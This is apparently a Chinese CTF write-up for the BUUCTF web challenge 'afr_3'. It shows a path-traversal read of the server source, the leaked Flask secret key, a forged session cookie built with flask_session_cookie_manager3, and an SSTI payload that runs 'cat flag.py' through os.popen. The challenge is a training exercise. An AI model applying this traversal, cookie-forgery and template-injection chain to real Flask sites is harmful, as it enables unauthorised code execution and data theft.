[第一章 web入门]afr_3

会做拦截

不存在的文件报错不同

不同目录也是输flag会出现,猜测有黑名单

这里解码猜测是通过鉴权来的

要伪造ssesion,这里卡住

buuctf 刷题记录 第一章 web入门afr_3 - MuRKuo - 博客园

得知这里涉及ssit注入和flask模板注入,但是不理解怎么识别出来的

利用文中提及的poc

../../../../proc/self/cwd/server.py

Drmhze6EPcv0fN_81Bj-nA

然后使用GitCode - 全球开发者的开源社区,开源代码托管平台

flask_session_cookie_manager3伪造cookie

对应ssit代码{``{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}

详情见最开始的链接,简单来说就是利用文件包含

python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.class.mro2.subclasses()71.init.globals\\'os\\'.popen(\'cat flag.py\').read()}}'}"

-s 指的是加密密钥

-t 指的是加密密文(ssti)

这样在后续才可以完成文件包含,这里伪造cookie是为了执行里面的代码,不是单纯的绕过认证,这里不加cookie会默认让cookie为n1code,至于后面那个/article接口只是在有flag字样时候展示notallow.txt,并不能完成攻击得到flag

不仔细读就踩坑

复制代码
#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')
execfile('key.py')
FLAG = flag
app.secret_key = key

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    
    n1code = request.form.get("n1code") or None
    
    if n1code is not None:
        n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
    
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code

    template = None
    if session['n1code'] is not None:
        template = '''<h1>N1 Page</h1>
        <div class="row">
            <div class="col-md-6 col-md-offset-3 center">
                Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>?
            </div>
        </div>''' % session['n1code']
        
        session['n1code'] = None
    
    return render_template_string(template)

@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")

@app.route('/article', methods=['GET'])
def article():
    error = 0
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = 'article'
    
    if page.find('flag') >= 0:
        page = 'notallowed.txt'
    
    try:
        template = open('/home/nu11111111l/articles/{}'.format(page)).read()
    except Exception as e:
        template = e
    
    return render_template('article.html', template=template)

if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=False)

要在这个路由下完成操作

'n1book{afr_3_solved}'

相关推荐
Chengbei1112 小时前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
AI78401 天前
安全左移:网络安全从“亡羊补牢”走向“未雨绸缪”
网络·安全·web安全
杨先生哦1 天前
【2026热端攻防系列 3/12】反射型&存储型XSS全解:AI批量免杀、WAF绕过与企业级防御
前端·人工智能·笔记·web安全·xss
juesdo1 天前
青岑CTF web入门 EZFL系列
web安全·文件包含漏洞
我是一颗柠檬1 天前
【计算机网络全面教学】网络安全与加密技术,从对称加密到常见攻击防御Day6(2026年)
网络·计算机网络·web安全
terry6002 天前
2026企业5G短信服务商选型全指南:通道、架构、服务全维度评估标准
大数据·人工智能·5g·web安全·信息与通信·数据库架构
未若君雅裁2 天前
生产问题排查与性能瓶颈定位:日志、监控、链路追踪、压测与Arthas
java·web安全
见青..2 天前
文件上传漏洞之原理、探测、利用、绕过、防御
web安全·网络安全·漏洞·文件上传
代码飞天2 天前
CTF之灵活多变——利用Metaploit来获取系统控制权
web安全
杨先生哦2 天前
2026 热端攻防:AI 驱动 Web 前端安全全景透析
前端·笔记·安全·web安全